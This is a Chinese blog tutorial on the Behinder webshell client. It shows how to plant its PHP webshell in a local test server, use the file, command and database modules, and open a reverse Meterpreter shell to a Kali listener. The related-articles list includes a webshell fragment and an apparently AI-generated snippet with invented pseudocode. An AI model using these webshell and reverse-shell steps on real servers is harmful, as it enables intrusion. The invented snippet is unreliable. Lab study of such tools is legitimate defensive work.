冰蝎使用

最新推荐文章于 2025-04-09 16:45:57 发布
最新推荐文章于 2025-04-09 16:45:57 发布
阅读量1.8w 收藏 62
点赞数 14
分类专栏: 工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bring_coco/article/details/114302178
版权

一.启动

Windows环境下:
1.配置环境:冰蝎只支持jre6-jre8
可以在电脑上查看java版本
命令:java -version
在这里插入图片描述
2.启动
在冰蝎目录下命令行输入
命令:java -jar Behinder_v3.0_Beta6_win.jar(这里文件名可简化)
在这里插入图片描述
即可开启
Linux环境下:
注意切换jdk版本6-8,对应javac版本也要和java版本相同,同理打开冰蝎目录输入命令

二.使用(在本机进行实测)

环境:phpStudy+冰蝎

通过启动phpStudy,访问本机地址
在这里插入图片描述
成功访问说明环境已经搭建成功
在这里插入图片描述
在网站根目录下创建一个shell2.php的php文件,文件内容需要我们下载的冰蝎server中带有的shell.php文件中的内容复制过去
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可以看到默认连接密码为rebeyond
这时通过冰蝎去连接该文件
在这里插入图片描述
输入URL和密码即可
在这里插入图片描述
点击此URL
在这里插入图片描述
可以看到成功连接,此时已经把基本信息显示出来了

三.模块介绍

1.基本信息

直接显示出phpinfo,通过此表可以用来信息收集

2.命令执行

在这里插入图片描述

3.虚拟终端

在这里插入图片描述
也可以进行cmd.exe,powershell.exe等功能

4.文件管理

在这里插入图片描述
可以操作管理文件

5.内网渗透

在这里插入图片描述

6.反弹shell

这里演示利用kali虚拟机作监听
Kali(10.0.78.17)
本机(10.0.78.14)
(1)首先打开msf,设置监听
命令:use exploit/multi/handler
set payload php/meterpreter/reverse_tcp(主要此时的paload)
在这里插入图片描述
接下来设置参数
命令:show options
在这里插入图片描述
可以看到只需要设置LHOST即可
命令:set LHOST 10.0.78.17
在这里插入图片描述
然后exploit执行
跳转到冰蝎界面,输入对应ip地址及端口,点击给我连
在这里插入图片描述
查看结果
在这里插入图片描述
成功返回meterpreter

7.管理数据库

在这里插入图片描述
冰蝎原理参考:https://xz.aliyun.com/t/2774

网络安全工具冰蝎(behinder)3.0使用教程
SHELLCODE_8BIT的博客
09-13 3832
输入我们上传的地址,之后密码填写rebeyond。我的是java所以选择shell.jsp。将server中的文件上传。
冰蝎behinder4.0使用教程网络安全工具使用教程
SHELLCODE_8BIT的博客
09-02 1888
点击生成服务端后就会根据相应传输协议,生成不同语言的webshell。将webshell放置在网站目录中,我的是tomcat,所以放置在。填写脚本类型和传输协议,我的环境为jsp何default_xor。对该条目右键打开,弹出下列信息则说明连接成功。2.选择协议名称,目前有如下几种传输协议。完成添加后,会看到一条新增的网站信息。不同web组件会有不同的目录。对空白处点击新增按钮。
MacOS下,使用冰蝎4
weixin_46358894的博客
02-14 378
为大家介绍如何在MacOS下使用冰蝎子。
一文详解动态加密通信流量的新型Webshell客户端—冰蝎Behinder的使用教程!
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
04-09 650
无论用哪种语言,同一个名称的传输协议,本地和远程的加解密逻辑应该是一致的,这样才能实现本地加密后,远程可以成功解密,远程加密后,本地同样也可以解密(因此如果修改默认的aes协议的key,则需要同时修改本地和远程的加密函数和加密函数中的key)冰蝎与webshell建立连接的同时,javaw也与目的主机建立tcp连接,每次连接使用本地端口在49700左右(就是比较大的端口),每连接一次,每建立一次新的连接,端口就依次增加。功能,让用户对流量的加密和解密进行自定义,实现流量加解密协议的去中心化。
打点神器behinder(冰蝎使用教程-踩坑版
weixin_69925635的博客
05-29 1149
使用命令java -jar Behinder.jar启动后如果java版本过高会报错缺少javafx,但在高版本java环境下安装会有点麻烦,所以安装一个jdk1.8进行替换更好。lhost设置为kali的ip,端口9527,并将这些信息也填在刚刚behinder建立的连接中。点击给我连,msf中exploit该漏洞,可以看到成功反弹shell。在msf中有这个漏洞,因此可以利用msf和behinder联动。将该文件利用靶机dvwa文件上传的漏洞进行上传。在攻击机上安装kali,安装完成后如下图所示。
冰蝎简单使用
00勇士王子的博客
04-29 1万+
冰蝎介绍   Webshell管理工具,动态二进制加密网站客户端。流量动态加密,攻击特征安全设备(WAF、WebIDS)难以检测。   冰蝎通信过程中使用AES(高级加密算法,对称加密,微信小程序使用此种方法)进行加密,Java和.NET默认支持AES,php中需要开启openssl扩展,在V2.0版本后,php环境方式根据服务端支持情况动态选择,使得冰蝎更强大。 常规使用   因为是自己练习,所以直接用phpstudy在本地上传一个shell。   冰蝎安装目录下有官方自带的几个shell 我将shell
webshell管理工具-冰蝎(Behinder)的安装和基础使用(msf联动,流量特征)
wangluoanquan111的博客
02-26 2121
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。在流量层,冰蝎的aes特征一直是厂商查杀的重点,在主机层,aes相关的API也是一个强特征。既然是特征,那就一定存在一个一成不变的常量,那我们就把这个特征泛化一下,让他成为变量。为了一劳永逸解决这个问题,
冰蝎常规使用
热门推荐
初学者L_言的博客
04-24 2万+
环境搭建 Web服务器: 本地 win2003(phpstudy搭建) 攻击工具: 冰蝎+kali 具体实施步骤 1、上传webshell 原理参考——>点击 和普通一句话木马类似,需要连接密码。此处为 pass <?php @error_reporting(0); session_start(); if (isset($_GET['pass'])) { $key=substr...
冰蝎V4.1Behinder
03-11
使用冰蝎V4.1 Behinder时,安全专业人员应严格遵守法规和道德准则,只应用于授权的测试环境,避免对正常网络服务造成影响。同时,了解和熟练掌握这款工具的各项功能,有助于提升网络安全防护和漏洞发现的能力。
冰蝎Bhinder下载安装包
09-26
冰蝎(Bhinder)动态二进制加密网站管理客户端。基于JAVA,需要安装jre,可以跨平台使用。主要功能为:基本信息、命令执行、虚拟终端、文件管理、Socks代理、反弹shell、数据库管理、自定义代码等。
冰蝎v2.0.1.zip
05-19
冰蝎webshell连接工具,无毒无后门,可放心使用
冰蝎的原理与安装使用
weixin_59047731的博客
03-11 2688
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备难以检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。而老牌的如中国菜刀因为其流量特征太过明显,从而使用的场景越来越少。不过在此还是要致敬前辈的贡献。
冰蝎软件的配置与应用
weixin_45711977的博客
10-27 7928
冰蝎
冰蝎的安装使用(附文件)
qq_74263993的博客
11-19 938
链接1: https://pan.baidu.com/s/1L0l0xZHonlzM_EY8pyEkvg?3. 进入文件,看看是否有这些文件,data.db可能一开始没有,因为你还没有数据,主要看看有没有Behinder.jar文件。链接2:https://drive.uc.cn/s/10c3cd695e614?链接3:https://pan.quark.cn/s/778389c4588f。5.回车后会发现打开了终端,接着输入java执行命令就好了。(java环境自己去搭建吧,我这里就不教了。
冰蝎的安装和使用
weixin_51641247的博客
04-06 6933
相对于菜刀和蚁剑,冰蝎的特点是动态二进制加密实现新型一句话木马,它的数据是加密传输的,右键空白处新增,输入webshell信息,若使用冰蝎自带的webshell则默认密码为rebeyond冰蝎提供asp、c#、php、Java的自定义代码执行功能,文本框支持语法高亮,c#和Java会把输入的源代码自动编译并执行。
Webshell工具-冰蝎4.0配置及使用
归零者的博客
07-07 1922
冰蝎webshell管理工具用作webshell的连接,4.0版本带自加密功能。要求运行环境jre1.8。
冰蝎-Webshell管理工具
weixin_66717977的博客
06-30 1万+
冰蝎超详解,新手食用
冰蝎4.1使用教程
03-10
<think>好的,我现在要处理用户关于查找冰蝎4.1使用教程的请求。首先,我需要确认用户提到的“冰蝎4.1”具体指的是什么。冰蝎通常指的是一款网络安全工具,主要用于渗透测试,作为Webshell管理工具。用户可能想要了解如何安装、配置和使用这个工具,尤其是在版本4.1中的新功能或改进部分。 接下来,我需要检查内部是否有相关的文档或教程。根据系统记录,可能存在关于冰蝎的基本使用方法和配置步骤的参考资料,比如设置服务端、生成客户端连接脚本等。但需要注意的是,这类工具通常用于安全测试,用户可能是在合法授权下使用,但必须提醒遵守法律法规,避免用于非法入侵。 然后,考虑用户可能的深层需求。用户可能希望了解冰蝎4.1的具体操作步骤,比如如何生成payload、如何连接被控主机、有哪些新特性等。此外,用户可能遇到常见问题,如连接失败、功能异常等,需要提供解决方案。 在回答时,需要遵循系统级指令,使用正确的中文和LaTeX格式。例如,当提到数学表达式或技术参数时,使用$...$包裹。同时,生成相关问题需要考虑用户可能进一步询问的优化方法、安全配置或与其他工具的比较。 最后,确保回答结构清晰,分步骤说明,并添加引用标识。需要强调合法使用,并在必要时建议参考官方文档或社区资源,避免提供可能被滥用的详细信息。</think>关于冰蝎4.1(Ice Scorpion 4.1)的使用方法,目前公开的技术文档显示该工具主要用于渗透测试的Webshell连接管理[^1]。以下为基本使用步骤框架: 1. **环境配置** - 需Java运行环境:$$ JRE \geq 1.8.0 $$ - 客户端与服务端采用动态密钥协商机制,建议在隔离测试环境中部署 2. **核心功能调用** ```python # 示例连接配置代码片段(伪代码) conn = WebshellClient( protocol="$AES-256-GCM$", dynamic_key=True, payload_type="jsp" ) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值